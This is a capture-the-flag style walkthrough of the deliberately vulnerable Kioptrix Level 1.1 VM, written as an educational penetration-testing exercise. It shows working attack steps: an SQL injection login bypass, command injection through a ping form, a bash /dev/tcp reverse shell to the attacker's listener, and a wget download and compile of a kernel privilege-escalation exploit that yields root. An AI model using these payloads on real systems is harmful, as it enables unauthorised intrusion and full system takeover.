VulnHub - Kioptrix Level 1.1 #2

Lets continue the Kioptrix series with Kioptrix Level 1.1 #2

## Objective

The Kioptrix series is aimed and beginners and thus are pretty easy challenges. The objective is getting root access to the vm via any means possible, except by hacking the actual vm client. The purpose of these vulnerable vm’s are to learn the basic techniques and tools used in penetration tests. There are more than one way of achieving the objective in this challenge.

The Kioptrix Level 1.1 VM can be downloaded from here. Note that it is an vmware image and can be used in vmware workstation or player. You can convert the image to be compatible with virtualbox.

## The Hack

The first step with every penetration test is intellegence gathering. This consists of passive / active recon and enumeration. Find out which services are running on the target server that are open to the world and which version they are using so that you can search for known vulnerabilities.

To achieve this we will be using a tool that will become the foundation of your pentesting toolkit. Nmap. nmap man page can be found here - it will explain all the options / flags / arguments usable with nmap.

apb@stratios:~$ nmap -sV -A -p-

Nmap scan report for
Host is up (0.00024s latency).
Not shown: 65528 closed ports
22/tcp   open  ssh      OpenSSH 3.9p1 (protocol 1.99)
| ssh-hostkey:
|   1024 8f:3e:8b:1e:58:63:fe:cf:27:a3:18:09:3b:52:cf:72 (RSA1)
|   1024 34:6b:45:3d:ba:ce:ca:b2:53:55:ef:1e:43:70:38:36 (DSA)
|_  1024 68:4d:8c:bb:b6:5a:bd:79:71:b8:71:47:ea:00:42:61 (RSA)
|_sshv1: Server supports SSHv1
80/tcp   open  http     Apache httpd 2.0.52 ((CentOS))
|_http-server-header: Apache/2.0.52 (CentOS)
|_http-title: Site doesn't have a title (text/html; charset=UTF-8).
111/tcp  open  rpcbind  2 (RPC #100000)
| rpcinfo:
|   program version   port/proto  service
|   100000  2            111/tcp  rpcbind
|   100000  2            111/udp  rpcbind
|   100024  1            617/udp  status
|_  100024  1            620/tcp  status
443/tcp  open  ssl/http Apache httpd 2.0.52 ((CentOS))
|_http-server-header: Apache/2.0.52 (CentOS)
|_http-title: Site doesn't have a title (text/html; charset=UTF-8).
| ssl-cert: Subject: commonName=localhost.localdomain/organizationName=SomeOrganization/stateOrProvinceName=SomeState/countryName=--
| Not valid before: 2009-10-08T00:10:47
|_Not valid after:  2010-10-08T00:10:47
|_ssl-date: 2018-01-19T12:08:32+00:00; -2h09m41s from scanner time.
| sslv2:
|   SSLv2 supported
|   ciphers:
|     SSL2_RC2_128_CBC_WITH_MD5
|     SSL2_RC4_128_WITH_MD5
|     SSL2_DES_192_EDE3_CBC_WITH_MD5
|     SSL2_RC4_128_EXPORT40_WITH_MD5
|     SSL2_RC4_64_WITH_MD5
|     SSL2_RC2_128_CBC_EXPORT40_WITH_MD5
|_    SSL2_DES_64_CBC_WITH_MD5
620/tcp  open  status   1 (RPC #100024)
631/tcp  open  ipp      CUPS 1.1
| http-methods:
|_  Potentially risky methods: PUT
|_http-server-header: CUPS/1.1
|_http-title: 403 Forbidden
3306/tcp open  mysql    MySQL (unauthorized)

Host script results:
|_clock-skew: mean: -2h09m41s, deviation: 0s, median: -2h09m41s

Service detection performed. Please report any incorrect results at .
Nmap done: 1 IP address (1 host up) scanned in 16.50 seconds

Above shows us which ports are open on the target server, what services are running on those ports and their versions.

The ones which might be of use to us are port 22(ssh), port 80(http), port 443(https) and 3306(mysql).

Because http and mysql are running, we can safely assume there might be a website running on this host, possibly a php website which would be connected to the MySQL service and could be vulnerable to sqli (sql injection).

Lets start there and see what comes up.

Browse to and you should see the following.

…And it’s a login page. Lets attempt some sqli.

Now I am assuming the original sql query in the app looks something like this

SELECT * FROM users WHERE username='$username' AND password='$password'

Expected Query

SELECT * FROM users WHERE username='admin' AND password='somepassword'

Injected Query

SELECT * FROM users WHERE username='1' or 1=1 -- -'  AND password=''

This works because sql injections are based on 1 = 1 is always true. Because 1 will ALWAYS be 1, the statement will return true, therefore allowing us to login.

Now we are given an application which can be used to ping network machines. Let’s test and ping the localhost.

So the ping actually works. Now I wonder if we can run other commands besides ping from this interface. Let’s test. Run localhost; ls; id and submit

This application / script is vulnerable to command injection. We are able to ping the machine, do a long listing of the directory the script resides in and see we are running as user apache.

Let’s take it a little further and see if we can get a remote shell. To do this we will run nc (netcat) on our kali machine to listen on a specific port, then execute bash on the target host to make a tcp connection to our kali machine on the specified port.

First set up nc on your kali machine to listen on port 80.

root@stratios:~# nc -nlvp 80
listening on [any] 80 ...

Then run a ping and the following command in the ping script.; bash -i >& /dev/tcp/ 0>&1

Go back to your kali shell and you’ll see it connected via remote shell

connect to [] from (UNKNOWN) [] 32779
bash: no job control in this shell
bash-3.00$ id
uid=48(apache) gid=48(apache) groups=48(apache)

And we got a shell on the target machine as the apache user. Let’s gather some information about this host which we can use to look for an privilege escalation exploit.

Get OS and kernel version

bash-3.00$ cat /etc/redhat-release
CentOS release 4.5 (Final)

bash-3.00$ uname -a
Linux kioptrix.level2 2.6.9-55.EL #1 Wed May 2 13:52:16 EDT 2007 i686 i686 i386 GNU/Linux

Now that we have version numbers, lets see if anything comes up in exploitdb.

apb@stratios:~$ searchsploit centos
Linux Kernel 2.6 < 2.6.19 (White Box 4 / CentOS 4.4/4.5 / Fedora Core 4/5/6 x86) - 'ip_append_data()' Ring0 Privilege Escalation (1)                | exploits/linux_x86/local/9542.c

apb@stratios:~$ searchsploit 2.6.9
Linux Kernel 2.6.9 < 2.6.11 (RHEL 4) - 'SYS_EPoll_Wait' Local Integer Overflow / Local Privilege Escalation                                         | exploits/linux/local/1397.c

Two hists to try. Lets start with the first one.

Copy the exploit to the /tmp directory and compile.

apb@stratios:/tmp$ cp /usr/share/exploitdb/exploits/linux_x86/local/9542.c /tmp/

apb@stratios:/tmp$ gcc -o 9542 9542.c
9542.c: Assembler messages:
9542.c:48: Error: operand type mismatch for `push'
9542.c:51: Error: invalid instruction suffix for `push'
9542.c:54: Error: invalid instruction suffix for `pop'

Getting the above error due to the exploit made on 32bit systems and trying to compile on 64bit.

Try again with an additional flag specifying it is for 32bit.

apb@stratios:/tmp$ gcc -m32 9542.c -o 9542

Now we need to get this exploit onto the target server.

Copy the exploit into the apache document root on your kali machine and start http.

root@stratios:/tmp# cp 9542 /var/www/html/
root@stratios:/tmp# cd /var/www/html/
root@stratios:/var/www/html# ls -l
total 24
-rwxr-xr-x 1 root root  7924 Feb 23 10:55 9542
-rw-r--r-- 1 root root 10701 Apr 16  2017 index.html
-rw-r--r-- 1 root root   612 Oct 20 16:41 index.nginx-debian.html
root@stratios:/var/www/html# /etc/init.d/apache2 start
[ ok ] Starting apache2 (via systemctl): apache2.service.

Download the exploit onto the target machine from the reverse shell, make it executable and run it.

bash-3.00$ cd /tmp
bash-3.00$ ls
bash-3.00$ wget
           => `9542'
Connecting to connected.
HTTP request sent, awaiting response... 200 OK
Length: 7,924 (7.7K)

    0K .......                                               100%  503.79 MB/s

21:19:55 (503.79 MB/s) - `9542' saved [7924/7924]

bash-3.00$ ls -l
total 8
-rw-r--r--  1 apache apache 7924 Feb 23  2018 9542

bash-3.00$ chmod +x 9542
bash-3.00$ ./9542
bash: [3333: 4] tcsetattr: Invalid argument
bash-3.00$ id
uid=48(apache) gid=48(apache) groups=48(apache)


So I’m guessing it might have something to do with trying to compile the exploit on kali.. so lets copy the exploit onto the target machine, compile it there and execute.

bash-3.00$ wget
           => `9542.c'
Connecting to connected.
HTTP request sent, awaiting response... 200 OK
Length: 2,643 (2.6K) [text/x-csrc]

    0K ..                                                    100%  252.06 MB/s

21:25:12 (252.06 MB/s) - `9542.c' saved [2643/2643]

bash-3.00$ gcc 9542.c -o priv
9542.c:109:28: warning: no newline at end of file
bash-3.00$ ls
bash-3.00$ chmod +x priv
bash-3.00$ ./priv
sh: no job control in this shell
sh-3.00# id
uid=0(root) gid=0(root) groups=48(apache)

Success! root shell obtained.

Exploit details:

“The udp_sendmsg function in the UDP implementation in (1) net/ipv4/udp.c and (2) net/ipv6/udp.c in the Linux kernel before 2.6.19 allows local users to gain privileges or cause a denial of service (NULL pointer dereference and system crash) via vectors involving the MSG_MORE flag and a UDP socket.”

Thanks for reading!